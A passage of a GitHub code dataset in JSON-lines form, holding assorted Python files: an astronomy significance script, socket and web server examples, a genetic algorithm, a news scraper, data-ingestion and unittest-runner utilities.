\n\"\"\"\n\nfrom rich.progress import track\nimport numpy as np\nimport pylab as plt\nfrom scipy.stats import poisson, norm\nfrom astropy.cosmology import FlatLambdaCDM\nfrom astropy.coordinates import SkyCoord\nimport astropy.units as u\nfrom plot_radial_distribution import Mask\n\n\nREDSHIFT_QSO = 6.9\nCOSMO = FlatLambdaCDM(H0=70, Om0=0.3)\nARCSEC_PER_KPC = COSMO.arcsec_per_kpc_comoving(REDSHIFT_QSO)\nDEG_PER_MPC = ARCSEC_PER_KPC.to(u.deg / u.Mpc)\nRA_QSO = (23 + (48/60) + (33.34/3600)) * (360/24) * u.deg\nDEC_QSO = (30 + (54/60) + (10.0/3600)) * -1 *u.deg\nqso_position = SkyCoord(ra = RA_QSO, dec = DEC_QSO)\n\ndef calculate_distances_to_quasar(ra_array: np.ndarray, dec_array: np.ndarray):\n \"\"\"Works out the distances to the quasar for a given ra and dec range.\"\"\"\n coords = SkyCoord(ra= ra_array*u.deg, dec = dec_array*u.deg)\n return qso_position.separation(coords)\n\ndef count_inner_outer(ra_array: np.ndarray, dec_array: np.ndarray, distance_deg: float) -> tuple:\n \"\"\"Calculates the number of sources within the deg distance and how many are outside of it.\"\"\"\n distances = calculate_distances_to_quasar(ra_array, dec_array)\n results = distances < distance_deg\n inner = len(np.where(results == True)[0])\n outer = len(np.where(results == False)[0])\n\n return inner, outer\n\ndef calculate_area_ratio(mask: Mask, radius: float) -> float:\n \"\"\"Works out the scaling factor for the counts.\"\"\"\n radius_pixels = radius / mask.deg_per_pix\n center = mask.wcs.world_to_pixel_values(RA_QSO.value, DEC_QSO.value)\n outer_area = mask.calculate_area(center, radius_pixels, 100000)\n inner_area = mask.calculate_area(center, 0, radius_pixels)\n print(outer_area)\n print(inner_area)\n ratio = inner_area/outer_area\n return ratio.value\n\nif __name__ == '__main__':\n decam = Mask('DECAM_MASK.fits')\n ra, dec = np.loadtxt('candidates_e.txt', unpack=True)\n\n distances = np.arange(40, 80, 5) *u.Mpc\n\n sigmas = []\n for distance in track(distances):\n inner_region_distance_deg = DEG_PER_MPC * distance\n inner, outer = count_inner_outer(ra, dec, inner_region_distance_deg)\n ratio = calculate_area_ratio(decam, inner_region_distance_deg)\n expected_inner = outer * ratio\n\n probability = poisson.cdf(inner, expected_inner)\n sigmas.append(norm.ppf(probability))\n\n plt.plot(distances, sigmas)\n plt.show()\n","repo_name":"TrystanScottLambert/DECam_Photometry","sub_path":"poissin_significance.py","file_name":"poissin_significance.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41202734601","text":"import asyncio\r\nimport socketio\r\nimport uvicorn\r\n\r\nPORT = 63047\r\ncount = 0\r\nsio = socketio.AsyncServer(async_mode='asgi')\r\napp = socketio.ASGIApp(sio)\r\ntick_queue = asyncio.Queue()\r\ntock_queue = asyncio.Queue()\r\n\r\n@sio.event\r\nasync def connect(sid, environ, auth):\r\n print('[%s]: connected' % sid)\r\n\r\n@sio.event\r\nasync def disconnect(sid):\r\n print('[%s]: disconnected' % sid)\r\n\r\n@sio.event\r\nasync def client_said(sid, data):\r\n global count\r\n message = 'This is server response #%d.' 
% count\r\n count += 1\r\n print('[%s]: %s' % (sid, data['message']))\r\n await sio.emit('server_said', { 'message': message })\r\n\r\nasync def tick_dequeue():\r\n while True:\r\n await asyncio.sleep(3)\r\n tick = await tick_queue.get()\r\n await sio.emit('tick', tick)\r\n print('tick_dequeue() qsize=%d' % tick_queue.qsize(), True)\r\n\r\nasync def tick_enqueue():\r\n print('tick_enqueue() start', True)\r\n while True:\r\n await asyncio.sleep(1)\r\n await tick_queue.put({\r\n 'security_code': '2330.TW',\r\n 'close': 601.15\r\n })\r\n print('tick_enqueue()', True)\r\n\r\nasync def init_task():\r\n print('init_task()', flush=True)\r\n for i in range(100):\r\n await tock_queue.put({ 'foo': 'bar%d' % i })\r\n\r\nasync def loop_task():\r\n while True:\r\n print('loop_task()', flush=True)\r\n tock = await tock_queue.get()\r\n await sio.emit('tock', tock)\r\n await sio.sleep(1)\r\n\r\n# Async background tasks have no effect if they are started inside main()\r\n# They also have no effect when run indirectly through server.py\r\n# Possibly a namespace issue\r\nsio.start_background_task(init_task)\r\nsio.start_background_task(loop_task)\r\n\r\n# Absolute module path for indirect execution\r\ntarget = 'servers.asgi_server:app'\r\n\r\ndef main():\r\n print('==============================')\r\n print(' async_mode = asgi')\r\n print('==============================')\r\n uvicorn.run(target, host=\"127.0.0.1\", port=PORT, log_level=\"info\")\r\n\r\nif __name__ == '__main__':\r\n # Absolute module path for direct execution\r\n target = 'asgi_server:app'\r\n main()\r\n","repo_name":"tacosync/skcomws","sub_path":"sandbox/servers/asgi_server.py","file_name":"asgi_server.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"7294356552","text":"import socket \r\nimport os,sys \r\nimport web_frame\r\n\r\nclass WebServer:\r\n def __init__(self):\r\n self.__fd_ser = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n\r\n # Build the HTTP response bytes\r\n def __formatHttp(self):\r\n response_line =self.response_line.encode()\r\n\r\n response_body = self.response_body\r\n\r\n response_header = f\"Content-Length:{len(response_body)}\\r\\n\"\r\n for kv in self.response_header:\r\n response_header += f\"{kv[0]}:{kv[1]}\\r\\n\"\r\n response_header = response_header.encode()\r\n response_blank = self.response_blank.encode()\r\n\r\n return response_line + response_header + response_blank + response_body\r\n\r\n def __getReqPath(self,recv_d):\r\n # Get the request line \r\n idx = recv_d.find(\"\\r\\n\")\r\n requestLine = recv_d[:idx]\r\n return requestLine.split(\" \")[1]\r\n\r\n # Parse the HTTP request data \r\n def __parseHttp(self,recv_d):\r\n path = self.__getReqPath(recv_d)\r\n env = {}\r\n env[\"path\"] = path\r\n return env\r\n \r\n def __handleRequest(self,fd_conn):\r\n recv_d = fd_conn.recv(1024).decode() \r\n env = self.__parseHttp(recv_d)\r\n self.response_body = web_frame.application(env,self.start_response)# env:dict \r\n fd_conn.send(self.__formatHttp())\r\n \r\n def start_response(self,status,response_header):# status:str,response_header:[(),()]\r\n self.response_line = f\"HTTP/1.1 {status}\\r\\n\"\r\n self.response_header = response_header\r\n self.response_blank = \"\\r\\n\"\r\n\r\n def run(self,ip=\"\",port=80):\r\n self.__fd_ser.bind((ip,port))\r\n self.__fd_ser.listen()\r\n while True:\r\n fd_conn,cli_addr = self.__fd_ser.accept()\r\n self.__handleRequest(fd_conn)\r\n fd_conn.close()\r\n\r\n self.__fd_ser.close()\r\n
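# Illustrative sketch (editorial, not part of the original file): the server
# above expects web_frame.application(env, start_response) to follow this
# WSGI-like contract -- call start_response(status, header_list), then return
# the response body as bytes. A minimal compatible web_frame module could be:
#
#     def application(env, start_response):
#         start_response("200 OK", [("Content-Type", "text/html")])
#         return ("<h1>hello " + env["path"] + "</h1>").encode()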
","repo_name":"zzzcb/robot","sub_path":"01python_advanced/03网络编程/day03web服务器和web框架/02自定义遵守WSGI接口的简单web服务器和简单web框架/server_遵守WSGI接口.py","file_name":"server_遵守WSGI接口.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"19781715925","text":"import math, random, string\nimport numpy as np\n\ntarget = \"kuldeeplovesgeneticalgorithm\"\n\ndef diff(s1, s2) :\n\tsum = 0\n\tfor i in range(len(s1)) :\n\t\tsum += (ord(s1[i])-ord(s2[i]))**2\n\treturn math.sqrt(sum)\n\ndef getRandomString() :\n\t# s = ''.join(random.SystemRandom().choice(string.ascii_lowercase + string.ascii_uppercase + string.digits) for _ in range(N))\n\t# return s.replace('[0-9]', ' ')\n\ts = \"\"\n\tfor i in range(len(target)) :\n\t\tif(target[i] != ' ') :\n\t\t\trandom_char = np.random.randint(ord('a'), ord('z'))\n\t\t\ts += chr(random_char)\n\t\t# else :\n\t\t# \ts += ' '\n\treturn s\n\n# selection\ndef selection(offsprings) :\n\tbest = None\n\tbest2 = None\n\tmin_val = 1e8\n\tmin_val2 = 1e8\n\tfor offspring in offsprings : \n\t\tval = diff(offspring, target) \n\t\tif(val < min_val) :\n\t\t\tmin_val = val\n\t\t\tbest = offspring\n\t\telif(val < min_val2) :\n\t\t\tmin_val2 = val\n\t\t\tbest2 = offspring\n\n\tif(best2 == None) : best2 = best\n\treturn best, best2\n\n# single point crossover\ndef crossover(s1, s2) :\n\tl1 = np.random.randint(len(s1))\n\tl2 = np.random.randint(len(s1))\n\toffspring1 = s1[:l1] + s2[l1:]\n\toffspring2 = s2[:l2] + s1[l2:]\n\treturn offspring1, offspring2\n\n# mutation\ndef mutation(s) :\n\trand_index1 = np.random.randint(len(s))\n\trand_index2 = np.random.randint(len(s))\n\tsList = list(s)\n\t# sList[rand_index1], sList[rand_index2] = sList[rand_index2], sList[rand_index1]\n\tsList[rand_index1] = chr(np.random.randint(ord('a'), ord('z')))\n\treturn ''.join(sList)\n\ndef generatePopulation(n, k) :\n\tpopulations = [] \n\tfor i in range(n) :\n\t\tpopulation.append(getRandomString(k))\n\treturn populations\n\ndef v(s1, s2) :\n\tif(np.random.rand() >= 0.5) :\n\t\ts1, s2 = crossover(s1, s2)\n\n\tpopulations = []\n\tfor i in range(len(s1)) :\n\t\tif(np.random.rand() >= 0.5) :\n\t\t\tpopulations.append(mutation(s1))\n\t\telse :\n\t\t\tpopulations.append(s1)\n\t\tif(np.random.rand() >= 0.5) :\n\t\t\tpopulations.append(mutation(s2))\n\t\telse :\n\t\t\tpopulations.append(s2)\n\n\treturn selection(populations)\n\nparent1 = getRandomString()\nparent2 = getRandomString()\n\nprint(\"parent1 = \", parent1)\nprint(\"parent2 = \", parent2)\niter = 0\nwhile(iter < 1000) :\n\tif((parent1 == target) or (parent2 == target)) :\n\t\tprint(\"Final parent1, Final parent2 = \", parent1, parent2)\n\t\tprint(\"Reached in iter\", iter)\n\t\tbreak\n\tprint(\"parent1, parent2 = \", parent1, parent2)\n\tparent1, parent2 = v(parent1, parent2)\n\titer += 1\n\nprint(\"end\")","repo_name":"kuldeep725/AI","sub_path":"Genetic Algorithm/genetic_algo.py","file_name":"genetic_algo.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13666452759","text":"from flask_restful import (abort)\n\n\ndef validate_data(user):\n error_msg = []\n if \"email\" not in user:\n error_msg.append(\"email must be provided\")\n if \"provider\" not in user:\n error_msg.append(\"social login provider must be provided\")\n if \"token\" not in user:\n error_msg.append(\"token must be provided\")\n return error_msg\n\n\ndef process_social_login(user):\n msg = 
validate_data(user)\n if len(msg) > 0:\n abort(403, message=msg)\n\n user_dict = {\n \"email\": user[\"email\"], \"id\": user[\"id\"],\n \"provider\": user[\"provider\"], \"first_name\": None,\n \"last_name\": None\n }\n\n if \"name\" in user:\n if \" \" in user['name']:\n names = user['name'].split(' ')\n user_dict[\"first_name\"] = names[0]\n user_dict[\"last_name\"] = names[1]\n else:\n user_dict[\"first_name\"] = user['name']\n\n print('lookup: {}'.format(user['email']))\n# other fields\n# id :\n# full name:\n# email\n# provider\n# token\n#\n\n\ndef process_social_logout(user):\n print(user)\n","repo_name":"BeeRaspberry/bee_api","sub_path":"bee_api/classes/user/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30906525569","text":"from conductr_cli.exceptions import MalformedBundleUriError\nfrom conductr_cli.resolvers.schemes import SCHEME_BUNDLE\n\n\nDEFAULT_ORG = 'typesafe'\nDEFAULT_REPO_BUNDLE = 'bundle'\nDEFAULT_REPO_BUNDLE_CONFIGURATION = 'bundle-configuration'\nURN_BUNDLE = '{}:'.format(SCHEME_BUNDLE)\n\n\ndef parse_bundle(uri):\n urn, rest = split_to_urn_and_rest(uri)\n org, repo, package = split_to_org_repo_package(rest, default_repo=DEFAULT_REPO_BUNDLE)\n package_name, tag, digest = split_package_to_parts(package)\n return urn, org, repo, package_name, tag, digest\n\n\ndef parse_bundle_configuration(uri):\n urn, rest = split_to_urn_and_rest(uri)\n org, repo, package = split_to_org_repo_package(rest, default_repo=DEFAULT_REPO_BUNDLE_CONFIGURATION)\n package_name, tag, digest = split_package_to_parts(package)\n return urn, org, repo, package_name, tag, digest\n\n\ndef split_to_urn_and_rest(uri):\n if len(uri.strip()) < 1:\n raise MalformedBundleUriError('{} is not a valid bundle uri'.format(uri))\n\n if uri.startswith('urn:'):\n if uri.startswith(URN_BUNDLE):\n return URN_BUNDLE, uri.replace(URN_BUNDLE, '')\n else:\n raise MalformedBundleUriError('{} is not a valid bundle uri'.format(uri))\n else:\n return URN_BUNDLE, uri\n\n\ndef split_to_org_repo_package(uri, default_repo):\n if len(uri.strip()) < 1:\n raise MalformedBundleUriError('{} is not a valid bundle uri'.format(uri))\n\n parts = uri.split('/')\n empty_parts = [part for part in parts if not part]\n if len(empty_parts) > 0:\n raise MalformedBundleUriError('{} is not a valid bundle uri'.format(uri))\n\n if len(parts) == 3:\n return parts\n elif len(parts) == 2:\n return DEFAULT_ORG, parts[0], parts[1]\n elif len(parts) == 1:\n return DEFAULT_ORG, default_repo, parts[0]\n else:\n raise MalformedBundleUriError('{} is not a valid bundle uri'.format(uri))\n\n\ndef split_package_to_parts(package):\n if ':' in package:\n package_name, version = package.split(':')\n if '-' in version:\n tag, digest = version.rsplit('-', 1)\n return package_name, tag, digest\n else:\n return package_name, version, None\n else:\n return package, None, None\n","repo_name":"typesafehub/conductr-cli","sub_path":"conductr_cli/bundle_shorthand.py","file_name":"bundle_shorthand.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"72"} +{"seq_id":"778262037","text":"from bs4 import BeautifulSoup\nimport requests\nfrom dateutil import parser\nimport os\nfrom urllib.parse import urlparse\n\n\ndef getArticle(url):\n r = requests.get(url)\n\n html_doc = r.text\n\n soup = BeautifulSoup(html_doc, 'html.parser')\n\n def getByline():\n try:\n 
byline = soup.find(\n 'span', itemprop='author').text.strip().split(',')[0]\n return byline\n except AttributeError:\n pass\n\n def getPublishDate():\n publishDate = parser.parse(\n soup.find('time', class_='tnt-date')['datetime']).strftime('%Y-%m-%d')\n return publishDate\n\n def getPhotoCaption():\n try:\n photoCaption = soup.find(\n 'span', class_='caption-text').text.strip()\n return photoCaption\n except:\n return None\n\n def getHeadline():\n headline = soup.find('h1').text.strip()\n return headline\n\n def getArticleText():\n p_list = []\n t = soup.find('div', itemprop='articleBody')\n for i in t.find_all('p'):\n p_list.append(i)\n return p_list\n\n def getTags():\n article_tags_list = []\n article_tags = soup.select('.asset-tags a')\n for i in range(0, len(article_tags)):\n article_tags_list.append(article_tags[i].getText())\n return article_tags_list\n\n def getPhotographerByline():\n try:\n fizz = soup.find(\n 'span', class_='tnt-byline').text.strip().split('/')[0]\n return fizz\n except AttributeError:\n pass\n\n def getPhoto(directory):\n photoSrc = soup.find_all('meta', itemprop='url')[-1]['content']\n photoAlt = soup.select('.image img')[0].get('alt')\n r = requests.get(photoSrc)\n imageFile = open(os.path.join(directory, os.path.basename(\n photoAlt.replace(' ', '-').lower() + '.jpg')), 'wb')\n for chunk in r.iter_content(100000):\n imageFile.write(chunk)\n image_name = photoAlt.replace(' ', '-').lower() + '.jpg'\n return photoSrc, image_name\n\n def createDir(headline):\n dirName = headline.replace(' ', '-').lower()\n fullDir = 'articles/' + dirName\n foo = dirName + '/image'\n os.makedirs('articles/' + foo, exist_ok=True)\n fizz = 'articles/' + foo\n return fizz, fullDir\n\n def getCategory():\n parsed_url = urlparse(url).path.split('/')\n category = str(parsed_url[1])\n return category\n\n headline = getHeadline()\n createDir(headline)\n imageDirectory = createDir(headline)[0]\n image_name = getPhoto(imageDirectory)[1]\n articleDirectory = createDir(headline)[1]\n articleBody = getArticleText()\n tagsList = getTags()\n photographerByline = getPhotographerByline()\n category = getCategory()\n photoCaption = getPhotoCaption()\n publishDate = getPublishDate()\n byline = getByline()\n\n return headline, byline, publishDate, category, articleBody, photographerByline, photoCaption, tagsList, articleDirectory, image_name\n","repo_name":"ryan-serpico/alligator-scraper","sub_path":"get_article.py","file_name":"get_article.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40085015292","text":"import json\nfrom collections import defaultdict\nfrom asgiref.sync import sync_to_async\nfrom db import Dataset, Model, Fit\n\n\n@sync_to_async\ndef create_dataset(name, parent, content):\n info = f'{len(content[\"x\"])} datapoints'\n Dataset(name=name, parent=parent, info=info, content=json.dumps(content)).save()\n\n\n@sync_to_async\ndef get_data_names():\n names_info = defaultdict(list)\n for d in Dataset.objects.all():\n names_info[d.parent].append({'name': d.name, 'id': d.id, 'info': d.info})\n return dict(names_info)\n\n\n@sync_to_async\ndef get_data_content(ID):\n try:\n d = Dataset.objects.get(id=ID)\n except Dataset.DoesNotExist:\n return None\n return json.loads(d.content)\n\n\n@sync_to_async\ndef delete_data(parent):\n Dataset.objects.filter(parent=parent).delete()\n\n\n@sync_to_async\ndef create_model(name, content):\n m, _ = Model.objects.get_or_create(name=name)\n m.content = 
json.dumps(content)\n m.save()\n\n\n@sync_to_async\ndef delete_model(name):\n Model.objects.get(name=name).delete()\n\n\n@sync_to_async\ndef get_models_names():\n return [x.name for x in Model.objects.all()]\n\n\ndef args_to_kwargs(d):\n kwargs = {x['name']: x['value'] for x in d['args']}\n if not d['expr_mode']:\n y0 = kwargs['y0']\n del kwargs['y0']\n for i in range(len(y0)):\n kwargs[f'y0[{i}]'] = y0[i]\n return kwargs\n\n\ndef args_to_consts(d):\n consts = {x['name']: x['const'] for x in d['args']}\n if not d['expr_mode']:\n y0 = consts['y0']\n del consts['y0']\n for i in range(100):\n consts[f'y0[{i}]'] = y0\n return consts\n\n\n@sync_to_async\ndef get_models_content(name):\n try:\n d = Model.objects.get(name=name)\n except Model.DoesNotExist:\n return\n\n data = json.loads(d.content)\n data['kwargs'] = args_to_kwargs(data)\n return data\n\n\n@sync_to_async\ndef get_all_models():\n data = {x.name: json.loads(x.content) for x in Model.objects.all()}\n for m in data:\n data[m]['kwargs'] = args_to_kwargs(data[m])\n data[m]['consts'] = args_to_consts(data[m])\n return data\n\n\nif __name__ == '__main__':\n print(get_models_names())\n","repo_name":"juliusbierk/simultant","sub_path":"pysrc/dbfcts.py","file_name":"dbfcts.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"74044681831","text":"import uuid\n\n\ndef handle_named_url(data_dict: dict):\n \"\"\"\n adding uuid to the named url\n , the name field was a bit\n confusing to the client.\n \"\"\"\n title = data_dict.get(\"title\")\n name = _remove_special_characters_from_package_url(title)\n if name is not None:\n name = name.replace(\" \", \"-\")\n name += \"-\" + str(uuid.uuid4())\n name = name.lower()\n return name\n\n\ndef _remove_special_characters_from_package_url(url):\n \"\"\"\n special characters are not\n accepted by CKAN for dataset\n urls, replace them\n \"\"\"\n special_chars = \"!\\\"”'#$%&'()*+,-./:;<=>?@[\\]^`{|}~.[]\"\n if url is not None:\n for i in url:\n if i in special_chars:\n url = url.replace(i, \"-\")\n\n return url\n","repo_name":"kartoza/ckanext-dalrrd-emc-dcpr","sub_path":"ckanext/dalrrd_emc_dcpr/logic/action/add_named_url.py","file_name":"add_named_url.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"15136435449","text":"n=int(input())\r\nl=[0]+list(map(int,input().split()))\r\nfor i in range(1,n+1):\r\n l[i]+=l[i-1]\r\nd={}\r\nfor i in l:\r\n if i not in d:\r\n d[i]=1\r\n else:\r\n d[i]+=1\r\nans=0\r\nfor a in d.values():\r\n ans+=a*(a-1)//2\r\nprint(ans)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/agc023/A/4892421.py","file_name":"4892421.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"43564936671","text":"import os\nimport sys\n\nfrom dataclasses import dataclass\nfrom sklearn.model_selection import train_test_split\n\nfrom src.logger import logging\nfrom src.exception import CustomException\nfrom src.utils import data_loader, save_dataframe\nfrom src.components.data_transformer import DataTransformer\nfrom src.components.model_trainer import ModelTrainner\n\n\n\n@dataclass\nclass DataIngestionConfig:\n raw_data_path: str = os.path.join('../../data', 'raw', 'StudentsPerformance.csv')\n train_data_path: str = os.path.join('../../artifacts', 'data', 'train.csv')\n 
test_data_path: str = os.path.join('../../artifacts', 'data', 'test.csv')\n\n\nclass DataIngestion:\n def __init__(self):\n self.data_ingestion_config = DataIngestionConfig()\n\n def initiate_data_ingestion(self):\n logging.info('Entered the data ingestion method or component.')\n try:\n df = data_loader(file_path=self.data_ingestion_config.raw_data_path)\n logging.info('Read the dataset as dataframe.')\n os.makedirs(os.path.dirname(self.data_ingestion_config.train_data_path),\n exist_ok=True)\n\n logging.info('Train Test split initiated.')\n train_df, test_df = train_test_split(df,\n test_size=0.3,\n random_state=101)\n\n save_dataframe(dataframe=train_df,\n path=self.data_ingestion_config.train_data_path)\n save_dataframe(dataframe=test_df,\n path=self.data_ingestion_config.test_data_path)\n\n logging.info('Data ingestion is completed.')\n\n return self.data_ingestion_config.train_data_path, \\\n self.data_ingestion_config.test_data_path\n\n except Exception as ex:\n raise CustomException(ex, sys)\n\n\nif __name__ == '__main__':\n obj = DataIngestion()\n train_df, test_df = obj.initiate_data_ingestion()\n\n data_transformer = DataTransformer()\n train_arr, test_arr, _ = data_transformer.initiate_data_transformation(train_df, test_df)\n\n model_trainer_obj = ModelTrainner()\n print(model_trainer_obj.initiate_model_trainer(train_arr, test_arr))\n","repo_name":"mmucds/score_prediction","sub_path":"src/components/data_ingestion.py","file_name":"data_ingestion.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"74044681831","text":"\"\"\"\n\nThis module solves the problem of running unittest test cases on multiple threads.\nIt exposes two entry points.\n\nNote:\nUsage is very simple: just call TestRunner's run method to execute the test cases; the number of threads to start can be passed as a parameter when running.\n\n\"\"\"\nimport os\nimport re\nimport traceback\nimport unittest\nimport sys\nimport time\nfrom concurrent.futures.thread import ThreadPoolExecutor\nfrom io import StringIO\n\nfrom jinja2 import Environment, FileSystemLoader\n\norigin_stdout = sys.stdout\n\n\ndef output2console(s):\n \"\"\"Write the captured stdout content back to the console\"\"\"\n tmp_stdout = sys.stdout\n sys.stdout = origin_stdout\n print(s, end='')\n sys.stdout = tmp_stdout\n\n\nclass OutputRedirector(object):\n \"\"\" Wrapper to redirect stdout or stderr \"\"\"\n\n def __init__(self, fp):\n self.fp = fp\n\n def write(self, s):\n self.fp.write(s)\n output2console(s)\n\n def writelines(self, lines):\n self.fp.writelines(lines)\n\n def flush(self):\n self.fp.flush()\n\n\nstdout_redirector = OutputRedirector(sys.stdout)\nstderr_redirector = OutputRedirector(sys.stderr)\n\n\nclass _TestResult(unittest.TestResult):\n \"\"\" Test result collector for the report\"\"\"\n\n def __init__(self):\n super().__init__()\n\n self.fields = {\n \"success\": 0,\n \"all\": 0,\n \"fail\": 0,\n \"skip\": 0,\n \"error\": 0,\n \"begin_time\": \"\",\n \"results\": [],\n \"testClass\": set()\n }\n self.sys_stdout = None\n self.sys_stderr = None\n self.outputBuffer = None\n\n def startTest(self, test):\n \"\"\"\n Called when a test case is about to run\n :return:\n \"\"\"\n super().startTest(test)\n self.start_time = time.time()\n self.outputBuffer = StringIO()\n stdout_redirector.fp = self.outputBuffer\n stderr_redirector.fp = self.outputBuffer\n self.sys_stdout = sys.stdout\n self.sys_stderr = sys.stderr\n sys.stdout = stdout_redirector\n sys.stderr = stderr_redirector\n\n def complete_output(self):\n if self.sys_stdout:\n sys.stdout = self.sys_stdout\n sys.stderr = self.sys_stderr\n self.sys_stdout = None\n self.sys_stderr = None\n return self.outputBuffer.getvalue()\n
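 # Editorial note (not part of the original file): startTest() swaps
 # sys.stdout/sys.stderr for the module-level redirectors pointed at a fresh
 # StringIO, so anything a test prints is captured for the report while
 # output2console() still echoes it to the real console; complete_output()
 # restores the originals and returns whatever was captured.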
\n def stopTest(self, test):\n \"\"\"\n Called after a test case has finished running\n :return:\n \"\"\"\n # get the execution time of the test case\n test.run_time = '{:.3}s'.format((time.time() - self.start_time))\n # get the docstring of the test case's class\n test.class_name = test.__class__.__doc__\n # get the method name of the test case\n test.method_name = test.__dict__['_testMethodName']\n\n # get the description of the test case\n test.method_doc = test.shortDescription()\n # save the result of this test case\n self.fields['results'].append(test)\n self.fields[\"testClass\"].add(test.class_name)\n\n self.complete_output()\n\n def stopTestRun(self, title=None):\n \"\"\"\n Called manually after the test cases have run to aggregate the result statistics\n :param title:\n :return:\n \"\"\"\n # number of failed cases\n self.fields['fail'] = len(self.failures)\n # number of errored cases\n self.fields['error'] = len(self.errors)\n # number of skipped cases\n self.fields['skip'] = len(self.skipped)\n # total number of cases\n self.fields['all'] = sum(\n [self.fields['fail'], self.fields['error'], self.fields['skip'], self.fields['success']])\n self.fields['testClass'] = list(self.fields['testClass'])\n\n def addSuccess(self, test):\n \"\"\"The test case passed; increase the success count by 1\"\"\"\n self.fields[\"success\"] += 1\n test.state = 'Passed'\n sys.stdout.write(\"{} result --> [PASS]\\n\".format(test))\n logs = []\n output = self.complete_output()\n logs.append(output)\n test.run_info = logs\n\n def addFailure(self, test, err):\n \"\"\"\n :param test: test case\n :param err: error information\n :return:\n \"\"\"\n super().addFailure(test, err)\n logs = []\n test.state = 'Failed'\n sys.stderr.write(\"{} result --> [FAIL]\\n\".format(test))\n # save the error information\n output = self.complete_output()\n logs.append(output)\n logs.extend(traceback.format_exception(*err))\n test.run_info = logs\n\n def addSkip(self, test, reason):\n \"\"\"\n Update the state of a skipped test case\n :param test: test case\n :param reason: related information\n :return: None\n \"\"\"\n super().addSkip(test, reason)\n test.state = 'Skipped'\n sys.stdout.write(\"{} result --> [SKIP]\\n\".format(test))\n logs = [reason]\n test.run_info = logs\n\n def addError(self, test, err):\n \"\"\"\n Update the state of an errored test case\n :param test: test case\n :param err: error information\n :return:\n \"\"\"\n\n super().addError(test, err)\n test.state = 'Error'\n sys.stderr.write(\"{} result --> [ERROR]\\n\".format(test))\n logs = []\n logs.extend(traceback.format_exception(*err))\n test.run_info = logs\n if test.__class__.__qualname__ == '_ErrorHolder':\n test.run_time = 0\n res = re.search(r'(.*)\\(.*\\.(.*)\\)', test.description)\n # get the class name for this error\n test.class_name = res.group(2)\n # get the method name for this error\n test.method_name = res.group(1)\n # get the description of the test case\n test.method_doc = test.shortDescription()\n # save the result of this test case\n self.fields['results'].append(test)\n self.fields[\"testClass\"].add(test.class_name)\n else:\n output = self.complete_output()\n logs.append(output)\n\n\nclass _ReRunResult(_TestResult):\n \"\"\"Result collector for rerun test cases\"\"\"\n\n def __init__(self, count, interval):\n super().__init__()\n self.count = count\n self.interval = interval\n self.run_cases = []\n\n def startTest(self, test):\n if not hasattr(test, \"count\"):\n super().startTest(test)\n\n def stopTest(self, test):\n if test not in self.run_cases:\n self.run_cases.append(test)\n super().stopTest(test)\n print(\"======================stop=================================\")\n\n def addFailure(self, test, err):\n \"\"\"\n :param test: test case\n :param err: error information\n :return:\n \"\"\"\n if not hasattr(test, 'count'):\n test.count = 0\n if test.count < self.count:\n test.count += 1\n sys.stderr.write(\"{} result --> [FAIL]\\n\".format(test))\n for string in traceback.format_exception(*err):\n sys.stderr.write(string)\n sys.stderr.write(\"================ rerunning {}, attempt {} ================\\n\".format(test, test.count))\n\n time.sleep(self.interval)\n test.run(self)\n else:\n if 
test.count != 0:\n sys.stderr.write(\"================ finished {} rerun(s) ================\\n\".format(test.count))\n super().addFailure(test, err)\n\n def addError(self, test, err):\n \"\"\"\n Update the state of an errored test case\n :param test: test case\n :param err: error information\n :return:\n \"\"\"\n if not hasattr(test, 'count'):\n test.count = 0\n if test.count < self.count:\n test.count += 1\n sys.stderr.write(\"{} result --> [ERROR]\\n\".format(test))\n for string in traceback.format_exception(*err):\n sys.stderr.write(string)\n sys.stderr.write(\"================ rerunning {}, attempt {} ================\\n\".format(test, test.count))\n time.sleep(self.interval)\n test.run(self)\n else:\n if test.count != 0:\n sys.stderr.write(\"================ finished {} rerun(s) ================\\n\".format(test.count))\n super().addError(test, err)\n\n\nclass TestRunner:\n \"\"\"unittest runner\"\"\"\n\n def __init__(self, suite: unittest.TestSuite,\n filename=\"report.html\",\n report_dir=\".\",\n title='Test Report',\n tester=' ',\n desc=\" \",\n templates=1\n ):\n \"\"\"\n Initialize the test runner\n :param filename: report file name\n :param report_dir: directory for the report file\n :param title: test suite title\n :param templates: pass 1 or 2 to choose the report style template; currently only two templates exist\n :param tester:\n \"\"\"\n if not isinstance(suite, unittest.TestSuite):\n raise TypeError(\"suite is not a test suite\")\n if not isinstance(filename, str):\n raise TypeError(\"filename is not str\")\n if not filename.endswith(\".html\"):\n filename = filename + \".html\"\n self.suite = suite\n self.filename = filename\n self.title = title\n self.tester = tester\n self.desc = desc\n self.templates = templates\n self.report_dir = report_dir\n self.result = []\n self.starttime = time.time()\n\n def classification_suite(self):\n \"\"\"\n Split the cases in the suite into multiple test suites, one per test class, packed into a list\n :return: list-->[suite,suite,suite.....]\n \"\"\"\n suites_list = 